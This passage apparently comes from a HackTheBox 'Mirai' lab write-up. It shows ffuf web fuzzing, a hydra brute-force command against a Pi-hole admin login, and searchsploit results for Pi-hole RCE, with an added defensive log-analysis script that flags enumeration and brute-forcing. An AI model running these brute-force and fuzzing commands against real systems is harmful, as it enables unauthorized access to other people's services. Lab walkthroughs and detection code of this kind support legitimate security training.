Web


Nmap discovered a web server running on target port 80. It’s lighttpd 1.4.35.

The web server returns a 404 on the web root.

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.48/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
 
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
versions                [Status: 200, Size: 18, Words: 1, Lines: 1, Duration: 39ms]
:: Progress: [882188/882188] :: Job [1/1] :: 13w34 req/sec :: Duration: [0:12:55] :: Errors: 0 ::

Fuzzing the web root reveals a directory and a file: /admin/ and /versions.

/versions


┌──(kali㉿kali)-[~/archive/htb/labs/mirai]
└─$ curl http://$IP/versions  
1675170158,,,

Not sure what this represents.

/admin/


It’s Pi-hole.

The version information is available at the bottom: Pi-hole 3.1.4, Web GUI 3.1, FTL 2.10.

There is a login page. I tried the default password, raspberry, and it didn’t work.

Brute-Forcing


┌──(kali㉿kali)-[~/archive/htb/labs/mirai]
└─$ hydra -l '' -P /usr/share/wordlists/rockyou.txt 'http-post-form://10.10.10.48/admin/index.php?login:pw=^PASS^:F=Wrong password!'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-31 14:19:19
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking http-post-form://10.10.10.48:80/admin/index.php?login:pw=^PASS^:F=Wrong password!
[status] 568.00 tries/min, 568 tries in 00:01h, 14343831 to do in 420:54h, 16 active

I had been running a brute-force attack for about 30 minutes and got nothing out of it.
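
From the defender's side, both the ffuf run and the hydra run above stand out in the web server's access log. The following is an added example, not part of the original write-up, that flags the two patterns per client IP; the lighttpd-style log format, the thresholds, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Assumed lighttpd-style line: client vhost user [time] "request" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

LOGIN_PATH = "/admin/index.php?login"  # login endpoint targeted in the hydra run
ENUM_404_MIN = 20    # assumed threshold: distinct missing paths per client
LOGIN_POST_MIN = 10  # assumed threshold: login POSTs per client

def analyze(lines):
    """Return {ip: set of findings} for clients that look like scanners."""
    missing = defaultdict(set)  # ip -> distinct paths answered with 404
    logins = Counter()          # ip -> POSTs to the login endpoint
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue            # skip lines that do not fit the assumed format
        ip, path = m["ip"], m["path"]
        if m["status"] == "404":
            missing[ip].add(path)
        # hydra needed a body string ("Wrong password!") to spot failures, so
        # this assumes status codes do not separate failed from good logins
        # and counts every POST to the endpoint instead.
        if m["method"] == "POST" and path == LOGIN_PATH:
            logins[ip] += 1
    findings = defaultdict(set)
    for ip, paths in missing.items():
        if len(paths) >= ENUM_404_MIN:
            findings[ip].add("content-enumeration")
    for ip, count in logins.items():
        if count >= LOGIN_POST_MIN:
            findings[ip].add("login-bruteforce")
    return dict(findings)

def sample_log():
    """Constructed sample: one noisy client and one ordinary client."""
    fmt = '{ip} 10.10.10.48 - [31/Jan/2023:14:19:20 +0000] "{req} HTTP/1.1" {st} 0 "-" "-"'
    lines = [fmt.format(ip="10.10.14.2", req=f"GET /word{i}.php", st=404) for i in range(40)]
    lines += [fmt.format(ip="10.10.14.2", req="GET /versions", st=200)]
    lines += [fmt.format(ip="10.10.14.2", req=f"POST {LOGIN_PATH}", st=200)] * 25
    lines += [fmt.format(ip="192.168.1.20", req=f"POST {LOGIN_PATH}", st=200)] * 2
    lines += [fmt.format(ip="192.168.1.20", req="GET /favicon.ico", st=404)]
    return lines

if __name__ == "__main__":
    for ip, tags in analyze(sample_log()).items():
        print(ip, sorted(tags))
```

Counting distinct 404 paths rather than total 404s keeps a client that repeatedly requests one missing file (such as a favicon) from being flagged.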

Vulnerability


┌──(kali㉿kali)-[~/archive/htb/labs/mirai]
└─$ searchsploit Pi-Hole 3.1.4
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Pi-hole < 4.4 - Authenticated Remote Code Execution                    | linux/webapps/48442.py
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escal | linux/webapps/48443.py
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Pi-Hole < 4.4 is vulnerable to RCE, but it requires authentication.